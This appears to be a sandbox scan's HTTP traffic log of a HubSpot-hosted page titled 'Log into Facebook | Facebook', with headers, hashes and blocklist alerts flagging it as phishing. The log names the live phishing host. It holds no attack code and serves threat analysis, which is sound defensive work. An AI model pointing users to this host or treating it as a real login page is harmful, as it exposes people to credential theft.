Last-Modified: Mon, 12 Sep 2022 20:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6470
Expires: Wed, 14 Sep 2022 12:13:50 GMT
Date: Wed, 14 Sep 2022 10:26:00 GMT
Connection: keep-alive

                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff2b71bb0-fd92-43d0-8cd0-b426d0b88ee8.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 15547
x-amzn-requestid: a78f7d90-84c3-4198-88bf-1d722c37f09f
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yauv4EUDoAMF13A=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f7ff-49535e5525606250306488ba;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:37:03 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: yP22CSG5x3BVfq29UMdw30TZcvuaL-kUDgjBZDUEMpRVDWqlZrCgdQ==
via: 1.1 1b0911478686968732f973d6e5e31d10.cloudfront.net (CloudFront), 1.1 01147dcc35d57fc0238a3c1700c13f16.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 21:42:05 GMT
age: 45835
etag: "366b2090d409d694b72b4b4131df46dd65d69c5a"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   15547
Md5:    56811a1a20a467464e1f3da171ef8b14
Sha1:   366b2090d409d694b72b4b4131df46dd65d69c5a
Sha256: 4c208fb88884166adf4ecc5882f75948b4a87d85c76ad6e7137e8edbd125c996
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Ff7859b5f-1c86-429e-be16-f7b41657b096.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 16980
x-amzn-requestid: f6211d45-1e26-49a6-8c46-412d8714501c
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YSIvUHPwoAMFzFQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-631d87fb-00d053687671af6214ea6ba9;Sampled=0
x-amzn-remapped-date: Sun, 11 Sep 2022 07:02:19 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: 1ZhWlfWQgEMpTF4Nrnc3RTN71UZICYJTNpVNUvEsurjMDp2e8mta4Q==
via: 1.1 9b311162717b41c968f6f00426d88aaa.cloudfront.net (CloudFront), 1.1 68fadeb91f97256bb67b03bfca74d830.cloudfront.net (CloudFront), 1.1 google
date: Wed, 14 Sep 2022 00:10:59 GMT
age: 36901
etag: "7674123112859fd79ee9214c5308ad6a5e4ed015"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   16980
Md5:    d7be52d818b206e064541ef4f4b0786b
Sha1:   7674123112859fd79ee9214c5308ad6a5e4ed015
Sha256: bb011cf1e3c97c42f22c0553b64c23f120fa52d4bc7b56b5bde5678226aff0ce
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F6b4d822c-5153-4c55-bcb3-aa6ee72e3b62.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 6078
x-amzn-requestid: e09c099f-5a2d-49d7-b6ab-e16f09c28bd0
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YavJEEM5IAMFreQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f8a0-0fbb7b3d0cd6fbfa04f5a5d2;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:39:44 GMT
x-amz-cf-pop: SEA73-P2, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: Ur-HTN2DS8b3ojSQldJOZi6YW2wtCwRfbGqxg49ZUJ_00hC_rFxYEw==
via: 1.1 9b21fd56256eda6d1379e32829c4c446.cloudfront.net (CloudFront), 1.1 5397b304713f6301c7c94ac084b6ed08.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 21:51:32 GMT
age: 45268
etag: "33d0dcadaa42179b2eae914c8ad16c9c088afbc9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   6078
Md5:    f2157f7cfbdeb607f28ae51eb090f2c3
Sha1:   33d0dcadaa42179b2eae914c8ad16c9c088afbc9
Sha256: 135cd89c2c82f0f5e53d2612d5eac868c175b28a567a07e63a2073942e36a066
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Faf118ca5-e4f8-4e97-a3c2-87e36a56e609.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 9270
x-amzn-requestid: bba505a1-bbba-4d14-ad3a-1f72c028cc43
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: YLj-YGaOIAMFeOw=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-631ae6c2-08d743cc73070f6653991180;Sampled=0
x-amzn-remapped-date: Fri, 09 Sep 2022 07:09:54 GMT
x-amz-cf-pop: SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: N0iUxQripFCaFLbMsp-lsFOMHDKzQUW3AHaWMyzOK9NGyAz5weDbvg==
via: 1.1 01c28b52813cd0e82f810c492808b142.cloudfront.net (CloudFront), 1.1 707e733794d52100fde0ab21bf0b1462.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 23:28:34 GMT
age: 39446
etag: "744a852e9357455d55e72809841411258fec44a9"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   9270
Md5:    b20499b3b8ef7b8ee73bd8b27e8c0c16
Sha1:   744a852e9357455d55e72809841411258fec44a9
Sha256: 457c8a9e4974a9529fa852b37f7ffc083e0eac987fe47aaebda808bf9f9f2941
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F26eefe41-9675-409e-9a6b-8c39594eb7de.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7543
x-amzn-requestid: a8a09d68-971d-4d84-bf6b-ca78644927b4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yau8DHQ4IAMFzFQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f84c-54803f1d5f1777f334c7a4d5;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:38:21 GMT
x-amz-cf-pop: HIO50-C1, SEA73-P1
x-cache: Hit from cloudfront
x-amz-cf-id: MdjZuif30Qf14NHbkELd3X2FqrPy5gGIJCnyjKrL2v5TY9DRD0VHiA==
via: 1.1 6ba2a21321beeef65404429d0a4b6380.cloudfront.net (CloudFront), 1.1 31119c39c5a6dc62dfa1fe940afd7be2.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 22:13:11 GMT
age: 43969
etag: "be8239300d4abfb14466655eedb6b277543ad8b2"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7543
Md5:    967db8594cfbc60139ea4bccfe259742
Sha1:   be8239300d4abfb14466655eedb6b277543ad8b2
Sha256: eb6585e04cd275e2bf02c2cf8d8693e43f0c0a3e7fec0092fc2ff18025b45dde
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F363e6209-41ce-41be-bd4b-698c502410aa.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 8523
x-amzn-requestid: facc0fcf-fc31-4c49-bf47-4992b0496f5b
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: Yav8AG1cIAMFmiQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-6320f9e6-3a07501574e592610dcd9d83;Sampled=0
x-amzn-remapped-date: Tue, 13 Sep 2022 21:45:10 GMT
x-amz-cf-pop: SEA19-C1, SEA73-P1
x-cache: Miss from cloudfront
x-amz-cf-id: wcReDELKUTdZfqKTbFNpzczrdUcvdH4XZGvajfVlcNduwLyHPfFpiw==
via: 1.1 7514e5e25722778fd4b1744d4ecc67e0.cloudfront.net (CloudFront), 1.1 e95ec8f1dc02e32f0cb9e113963ceb4e.cloudfront.net (CloudFront), 1.1 google
date: Tue, 13 Sep 2022 22:00:47 GMT
etag: "e93a0bcbb4d394a087a6fd2a95e31cd371186433"
age: 44713
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   8523
Md5:    69d287fa3fde0ea0ad5ac42fc708fb7d
Sha1:   e93a0bcbb4d394a087a6fd2a95e31cd371186433
Sha256: 5bb5a92d6498fee73ada8b2b8cf79ca4f6a7cd7ce35bab9b877870a847f212cc
                                        
                                            GET /classic/00/6.png HTTP/1.1 
Host: widgets.amung.us
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://appnewstv.hs-sites-eu1.com/
Connection: keep-alive

                                         
                                         104.22.75.171
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Date: Wed, 14 Sep 2022 10:26:00 GMT
Content-Length: 1410
Connection: keep-alive
last-modified: Sun, 13 Jun 2010 09:03:09 GMT
etag: "4c149ecd-582"
expires: Sun, 11 Sep 2022 23:24:09 GMT
cache-control: max-age=2678400
access-control-allow-origin: *
CF-Cache-Status: HIT
Age: 298911
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 74a86c034d219900-ARN


--- Additional Info ---
Magic:  PNG image data, 81 x 29, 8-bit colormap, non-interlaced\012- data
Size:   1410
Md5:    e43e3ae20dc98a8bba17cda0793be0c3
Sha1:   29a97fff679609fba73ce7101033599f67e562d9
Sha256: c8a534024e9cc41a762cf27f44303b696f56cd20dcc9947126bd6192d4c3226e
                                        
                                            GET /content-tools-menu/api/v1/tools-menu/has-permission?portalId=26246913&callback=jsonpHandler HTTP/1.1 
Host: app-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.236.181
HTTP/2 204 No Content
                                        
date: Wed, 14 Sep 2022 10:26:01 GMT
cf-ray: 74a86c03fd8495de-ARN
cache-control: max-age=0
strict-transport-security: max-age=31536000; includeSubDomains; preload
cf-cache-status: DYNAMIC
access-control-allow-credentials: true
access-control-allow-methods: GET
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://exceptions.hubspot.com/csp/reports?cfRay=74a86c03fd8495de&resource=unknown"}]}
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: d21f3635-c7ed-4431-9cb6-053973015ca0
x-trace: 2BE6BC9D93F807DD504BECC77526E82D8E05EE2FC0000000000000000000
set-cookie: __cf_bm=94yrk4dEUPTWGPFLfQiQSGPCHmdRmbf2bJdTJN1LpL8-1663151161-0-ARC4iiiiRMOFtubqKDT+XhbeHbtYpM0tLIZIE5f4/9+eiBHcAkgVUyxQRjYfydw1PDwJbXCwGIPSv5pjMBA+l6Q=; path=/; expires=Wed, 14-Sep-22 10:56:01 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
vary: Accept-Encoding
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-scripts.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.208.22
HTTP/2 200 OK
content-type: application/javascript;charset=utf-8
                                        
date: Wed, 14 Sep 2022 10:26:02 GMT
x-trace: 2B2D9E835AF3E42AB522B0F11BCD6998D2DA41E8E8000000000000000000
cache-control: public, max-age=30
vary: Accept-Encoding
x-hubspot-correlation-id: 35962987-4b8f-4281-835f-cddf2d63b924
access-control-allow-credentials: true
access-control-max-age: 3600
access-control-allow-origin: http://appnewstv.hs-sites-eu1.com
cf-cache-status: EXPIRED
last-modified: Wed, 14 Sep 2022 08:19:32 GMT
server: cloudflare
cf-ray: 74a86c0ba9a695fc-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (546)
Size:   525
Md5:    24ade24f6b360c8a47061513294b5f71
Sha1:   0f3f65149f9386ff07b0f01de95828c5d767d123
Sha256: 74270bebdb68880902f36ee1cb17a3ecc047b01e5f6c86b03cdfd72762171b67
                                        
                                            GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246913&pi=53071520739&ct=standard-page&ccu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com&cpi=53071520739&lpi=53071520739&lvi=53071520739&pu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com%2F%230.3601203526844585&t=Log+into+Facebook+%7C+Facebook&cts=1663151147159&vi=e6aeadea164a902da047fa1f14bd8ee9&nc=true&u=205882892.e6aeadea164a902da047fa1f14bd8ee9.1663151147157.1663151147157.1663151147157.1&b=205882892.1.1663151147157&cc=15 HTTP/1.1 
Host: track-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.240.166
HTTP/2 200 OK
content-type: image/gif
                                        
date: Wed, 14 Sep 2022 10:26:02 GMT
content-length: 45
cf-ray: 74a86c0c0ee90d52-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Wed, 14 Sep 2022 10:26:02 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: 1b016721-1aeb-454e-8d8e-64e438f4ea57
x-robots-tag: none
set-cookie: __cf_bm=Q5PwYvNgccAEDkOdiCCGp52T2myhZ2x1O50H45w6JdQ-1663151162-0-AfYTIOD+E8cA2Bd74QKBh1KsN7l6WJ9qzyy9c772xDk5gzFGPO4ug4qaFt7THqTjLMK3vH/Wunzy0ej//U+BBeo=; path=/; expires=Wed, 14-Sep-22 10:56:02 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p%2B8vzHAnx5QlWk9TQy3O5LaEDpG6UIi7eG%2FZCCIG96SFHD2SjydXhylYTWufP7s3zS8ImJ3s7nnSppYYjs6uBC2JsXQNvB%2BbSCSCBMBVXsTMQ7f6FhrVNiZUsttctCiSzNtpeXimJA%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
                                            GET /__ptq.gif?k=1&sd=1280x1024&cd=24-bit&cs=UTF-8&ln=en-us&bfp=931822577&v=1.1&a=26246913&pi=53071520739&ct=standard-page&ccu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com&cpi=53071520739&lpi=53071520739&lvi=53071520739&pu=http%3A%2F%2Fappnewstv.hs-sites-eu1.com%2F%230.3601203526844585&t=Log+into+Facebook+%7C+Facebook&cts=1663151148375&vi=e6aeadea164a902da047fa1f14bd8ee9&nc=true&u=205882892.e6aeadea164a902da047fa1f14bd8ee9.1663151147157.1663151147157.1663151147157.1&b=205882892.1.1663151147157&cc=15 HTTP/1.1 
Host: track-eu1.hubspot.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         172.65.240.166
HTTP/2 200 OK
content-type: image/gif
                                        
date: Wed, 14 Sep 2022 10:26:02 GMT
content-length: 45
cf-ray: 74a86c0c5f4d0d52-ARN
accept-ranges: bytes
cache-control: no-cache, no-store, no-transform
last-modified: Wed, 14 Sep 2022 10:26:02 GMT
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: Accept-Encoding
cf-cache-status: MISS
access-control-allow-credentials: false
p3p: CP="NOI CUR ADM OUR NOR STA NID"
x-hubspot-correlation-id: aa516379-cb41-4356-935a-d19ed9fbc119
x-robots-tag: none
set-cookie: __cf_bm=iEePw7Nqna5DmtpAL94qNCeHIcPHieRcx8jNGkg5iEM-1663151162-0-AfO0TggqYjlNDdux0ev1Elzqh/DMbTwKMMaObsD49ukGrvUv6iMuks698beUsN5Y1b36NxhpomKtcRxDu85ISzE=; path=/; expires=Wed, 14-Sep-22 10:56:02 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JdqHsOBKUVh7zeCXBjNfGSLoR1Ebnnar1sGaDetsyd6m52wtyWAKNB4bU%2B8MG14CZ7I%2FqJQ6%2F%2Bh%2BzXfwl%2B%2BeJ8xr7OOlgNkWX9Nn1O1ceb%2FA9e8QRJg4NNR3%2FoCKO8VWrFGu%2BeoGLg%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   45
Md5:    c8817d472077ebfc04593c1fa019d32d
Sha1:   e1e86f41c86c7b9cd2e8b76c6a925a1a3e7e3247
Sha256: dc111a70984a9eda00752b06277113029ef288f1125c31eff2477413e15e8aa4
                                        
                                            POST /_hcms/perf HTTP/1.1 
Host: appnewstv.hs-sites-eu1.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-type: application/json
Content-Length: 739
Origin: http://appnewstv.hs-sites-eu1.com
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Cookie: __hstc=205882892.e6aeadea164a902da047fa1f14bd8ee9.1663151147157.1663151147157.1663151147157.1; hubspotutk=e6aeadea164a902da047fa1f14bd8ee9; __hssrc=1; __hssc=205882892.1.1663151147157

                                         
                                         172.64.154.3
HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
                                        
Date: Wed, 14 Sep 2022 10:26:04 GMT
Content-Length: 2
Connection: keep-alive
CF-Ray: 74a86c178afd0b59-OSL
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Access-Control-Allow-Credentials: false
X-HubSpot-Correlation-Id: a4f48951-81be-4d82-a473-f0445098a248
X-Robots-Tag: none
X-Trace: 2BD24349C0BC3B0271FC5C6A78C6FCBCEAFE6BBA7C000000000000000000
Server: cloudflare
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   2
Md5:    e0aa021e21dddbd6d8cecec71e9cf564
Sha1:   9ce3bd4224c8c1780db56b4125ecf3f24bf748b7
Sha256: 565339bc4d33d72817b583024112eb7f5cdf3e5eef0252d6ec1b9c9a94e12bb3

Alerts:
  Blocklists:
    - openphish: Facebook, Inc.
    - fortinet: Phishing
                                        
                                            GET /analytics/1663151100000/26246913.js HTTP/1.1 
Host: js-eu1.hs-analytics.net
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.238.60
HTTP/2 200 OK
content-type: text/javascript
                                        
date: Wed, 14 Sep 2022 10:26:01 GMT
x-amz-id-2: EtHDD3ZJ+jHFv9kGayq1VJF1GO72doBXHa4SUAaSBH/paVgPi+YlaUcoNmmVa05fqwQSJEkPjTc=
x-amz-request-id: YXXMVF8WG4KTQKHP
last-modified: Tue, 13 Sep 2022 13:50:54 GMT
etag: W/"a465556d49817da34d8ad624037e7756"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
access-control-allow-credentials: false
expires: Wed, 14 Sep 2022 10:31:01 GMT
cf-cache-status: MISS
vary: Accept-Encoding
server: cloudflare
cf-ray: 74a86c041c36f14a-ARN
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (63804)
Size:   20217
Md5:    07371fc1a0807031f2b4ad03c43e8f99
Sha1:   50af4a7a69dbcea6267569c00172c7b52ef45b09
Sha256: c3827f08c5bd8ce062fc5e8c3c230d7f0bb591065c620b38f1cd5a4fa519f090
                                        
                                            GET /26246913.js HTTP/1.1 
Host: js-eu1.hs-banner.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://appnewstv.hs-sites-eu1.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
                                         172.65.202.201
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
date: Wed, 14 Sep 2022 10:26:00 GMT
x-amz-id-2: eMvK/+B+42bBRulR0IJXLilgHC+cniLzaOvjYRJ/vPUvuhfzQdr5DZbhrA9aZpZloYv8hRCJ5Mc=
x-amz-request-id: TZJG9K9055D38NE7
last-modified: Tue, 13 Sep 2022 13:50:52 GMT
etag: W/"32ad209e131aa4d3350f4e63295ad005"
x-amz-server-side-encryption: AES256
cache-control: max-age=300, public
x-amz-version-id: UBvwYk_We_pJ5IIipKbbbJNIhGE5mW1n
access-control-allow-origin: https://appnewstv.hs-sites-eu1.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
expires: Wed, 14 Sep 2022 10:31:00 GMT
cf-cache-status: REVALIDATED
vary: Accept-Encoding
